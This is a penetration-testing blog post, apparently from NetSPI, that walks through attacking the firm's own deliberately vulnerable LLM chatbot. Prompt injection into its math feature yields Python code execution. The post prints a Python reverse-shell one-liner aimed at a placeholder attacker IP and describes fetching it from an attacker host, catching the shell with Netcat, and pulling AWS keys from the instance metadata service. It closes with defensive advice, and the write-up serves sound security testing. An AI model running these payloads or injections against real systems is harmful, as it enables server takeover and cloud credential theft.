How to Exploit a Generative AI Chatbot using Prompt Injection

The NetSPI Agents

The NetSPI Agents have encountered various chatbot services that utilize a large language model (LLM). LLMs are advanced AI systems developed by training on extensive text corpora, including books, articles, and websites. They can be adapted for various applications, such as question-answering, analysis, and interactive chatbots. NetSPI created an interactive chatbot that consists of common vulnerabilities seen in LLMs including prompt injection which can be leveraged by an attacker to manipulate the functionality of a chatbot to carry out malicious acts. Examples include sensitive information disclosure and under certain circumstances, remote code execution (RCE). Read on to learn about our vulnerable interactive chatbot and understand the vulnerabilities that are present.

How does our chatbot work?

To understand how LLMs function, like the one used in our chatbot, it’s important to note that they typically consist of multiple components working together. These components enable specific functionalities, such as retrieving information from databases, performing calculations, or executing code. At the core is the language model itself, which processes user inputs and generates responses. Generally, LLMs cannot call external functions themselves, but they are often supported by additional systems that facilitate these capabilities.

Outside of general testing of how “jailbreakable” a given model is, our testing methodology focuses on evaluating the security posture of an AI-powered chatbot. We aim to showcase the extent of its capabilities, identify potential weaknesses in how it handles user inputs, and assess the risks associated with its code execution functionality. Our chatbot allows users to interact with it through prompts and queries without any need for authentication, presenting a potential security risk in and of itself. Furthermore, the model can execute Python code in response to specific prompts. This quickly informs a user that the chatbot’s architecture includes an interface with the underlying operating system, allowing it to indirectly perform functions beyond simple text generation.

Through a combination of prompt engineering techniques, we demonstrate how to inject various commands and payloads to test the chatbot’s security controls, with the goal being to understand if the chatbot can be manipulated to perform unauthorized actions or grant improper access to the underlying infrastructure. The results of our testing reveal that the chatbot’s code execution functionality is not adequately restricted or isolated. By submitting carefully crafted prompts, we can achieve remote code execution (RCE) on the server hosting the chatbot. This allows us to perform unauthorized actions and access sensitive resources, highlighting a significant security vulnerability in the AI system’s implementation. While the exact architecture and integration methods we regularly test are not transparent to us, following a similar approach to each test can result in successful exploitation of the LLM and its associated components, even to the extent of being able to execute commands on the underlying infrastructure.

Our methodology emphasizes the critical importance of implementing robust security controls and conducting thorough security testing for AI-powered applications, especially those that accept untrusted user inputs. In the following sections, we will detail the technical steps taken to identify and exploit this vulnerability, or many other similar vulnerabilities for that matter. The goal of this blog is to provide insights into the potential risks associated with insecure AI system deployments. Furthermore, we will offer recommendations for securely implementing and testing AI chatbots and similar applications to help organizations mitigate these risks.

Methodology

Chatbots are often implemented as a supplemental tool embedded in a web application to enhance a product or service. For this walkthrough, our vulnerable chatbot will be represented as an externally accessible asset that could be discovered using various techniques such as web scraping. Additionally, there is no authentication mechanism in place that would prevent an attacker from submitting prompts to the chatbot. Observe that the chatbot advertises the ability to evaluate math expressions which indicates the potential for prompt injection.

During initial reconnaissance, we want to query for additional information regarding functions of the chatbot, specifically around the math feature. The chatbot reveals that it can conduct data analysis and execute Python code to evaluate mathematical expressions.

Let’s prompt the chatbot to evaluate the mathematical expression shown under the “Special Feature!” window. Notice that it returns the expected response.

Now that we know the chatbot uses Python to evaluate the mathematical expressions, prompt the chatbot to execute a single line of Python code using the Subprocess library to see if any restrictions have been implemented. Observe the command was executed successfully and revealed the current user is “ubuntu”.

As we continue to execute various commands, note that in some instances the chatbot will explain the purpose of the provided Python code rather than execute it. These responses should aid in the exploitation of the chatbot as they can provide detailed errors for us to make adaptations.

Due to the nature of LLMs, determining the model’s target function is challenging. Instead of executing the code we submit, it often explains the code. We can conclude that this variability isn’t an intended feature of the model. As a result, we can re-issue the same prompts to get the Python code executed.

Up until this point we are unable to verify that the chatbot is executing code as it may be simply generating responses that it thinks are appropriate for our prompts. While the responses seem to indicate that code execution is occurring, there is no definitive proof.

To conclusively demonstrate that we are indeed executing code through the chatbot, we need it to interact with us in a way that would unambiguously show it had completed the prompted task. This requires devising a test that would produce a verifiable external effect, beyond just the chatbot’s text responses.

One way to achieve this is by prompting the chatbot to perform a network request to a server under our control. If the chatbot executes the code and makes the request, we would be able to observe it on our server, confirming that code execution is taking place.

To do this, we can prompt the chatbot to make a HTTP GET request to a NetSPI controlled Collaborator instance.

Monitoring our Collaborator instance, we see that the prompt was executed from the hosting server and the request was successfully received. Notice that the body of HTTP response returned by the chatbot matches what was shown in the Collaborator instance.

After confirming the ability to execute basic Python commands, we can now attempt to take control of the hosting server. Create a Bash script file, called “netspi.sh”, that will initiate a reverse shell via a Python one-liner.

Contents of “netspi.sh”:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[Attacker’s IP Address]",80));os.dup2(s.fileno(),0);os.dup2(sfileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'

Prompt the chatbot to retrieve the “netspi.sh” script from a NetSPI controlled host running a Python Simple HTTP Server:

We can see that the file was retrieved by the chatbot’s hosting server:

Now prompt the chatbot to add executable rights to the “netspi.sh” script and list the permissions for the file to verify the changes were made.

Start a Netcat listener on a NetSPI controlled host to catch the reverse shell and prompt the chatbot to execute the “netspi.sh” script.

Observe that a response is never given by the chatbot as the connection has established to our Netcat listener. Using the reverse shell, we can verify all previously submitted prompts to the chatbot had returned accurate data in the responses.

With root access to the hosting server, we can also view sensitive files.

Let’s try to prompt the chatbot to disclose information regarding how it is architected to identify the full attack surface. This information is available via our shell access; however, we want to return to the chatbot interface to see if we can get the chatbot to disclose sensitive information.

Since we know that the chatbot’s hosting server lives in AWS, we can attempt to escalate privileges by prompting for additional information. Using the AWS CLI, we elucidate the web server had an IAM profile, allowing it to perform actions within AWS. Instead of using the AWS CLI directly, we can opt to use the IMDS to extract credentials for this IAM profile.

The following prompt can be used to request a valid token from the Instance Metadata Service (IMDS) that is internally accessible to the hosting server at 169.254.169.254.

Then we can use the valid token to retrieve the AWS profile’s “AccessKeyId” and “SecretAccessKey”.

With the credentials in hand, we can authenticate to the AWS account directly and begin to take actions under the authorization of the compromised web server. Additional attacks could be taken from here to further compromise the associated AWS environment. It’s also important to note that outside of compromising the integrity of this asset, this type of attack can have a direct financial impact on the owner.

Wrap-Up

A wide variety of exposure to different environments has procured the research required to make this walkthrough. We have hopefully demonstrated the critical importance of security testing for AI systems, particularly those that are externally accessible like chatbots and other LLM-powered services often are. As we’ve shown, AI systems with inadequate security controls, that are supported by additional systems that enable specific functionalities, can be exploited to gain unauthorized access, and compromise the underlying infrastructure. The successful exploitation of the chatbot in this assessment highlights the need for a multi-layered approach to securing AI systems. This includes:

Implementing strong authentication and access controls to prevent unauthorized interaction with the AI/ML system.
Properly isolating the AI/ML model to restrict its ability to perform unintended actions, such as executing arbitrary code or accessing sensitive resources.
Validating and sanitizing all inputs to the AI/ML system to prevent prompt injection and other exploitation techniques.
Monitoring the AI/ML system’s behavior for anomalies and potentially malicious activities.
Conducting regular security assessments and penetration testing to identify and remediate vulnerabilities.

Moreover, it is imperative for organizations to fully acknowledge and comprehend the evolving threat landscape associated with AI and machine learning technologies. In light of the critical insights and recommendations we’ve shared, it’s time to take decisive action to protect your AI and machine learning systems:

Start by assessing your current security posture to identify potential vulnerabilities.
Implement robust security measures, such as strong authentication, isolation, input validation, and continuous monitoring, to enhance the resilience of your AI systems.
Engage in continuous learning to stay informed about the latest developments in AI security, and regularly update your practices to address emerging threats.
Collaborate with industry peers, share knowledge, and participate in security workshops to collectively improve AI security.
Commit to regular penetration testing and security assessments to ensure your AI systems remain robust against attacks. By taking these proactive steps, you not only protect your organization but also contribute to a safer and more secure AI ecosystem for everyone.

Together, we can build a future where AI technology is both powerful and secure. Join us in this mission, implement these security measures today, and be a part of the movement towards a safer AI-driven world.

To learn more about our AI Pentesting capabilities, click here!

The CISO’s Guide to Securing AI/ML Models

Gut Check: Are You Getting the Most Value out of Your Penetration Testing Report?

Chubb partners with NetSPI to bring attack surface management to its policyholders

Partner with NetSPI

Exploiting a Generative AI Chatbot – Prompt Injection to Remote Code Execution (RCE)

Joshua Murrell,

Kurtis Shelton

The NetSPI Agents

How does our chatbot work?

Methodology

Wrap-Up

Authors:

Explore more blog posts

Ask These 10 Questions to Enhance Your Social Engineering Testing

Part 1: Ready for Red Teaming? Intelligence-Driven Planning for Effective Scenarios

The Strategic Value of Platformization for Proactive Security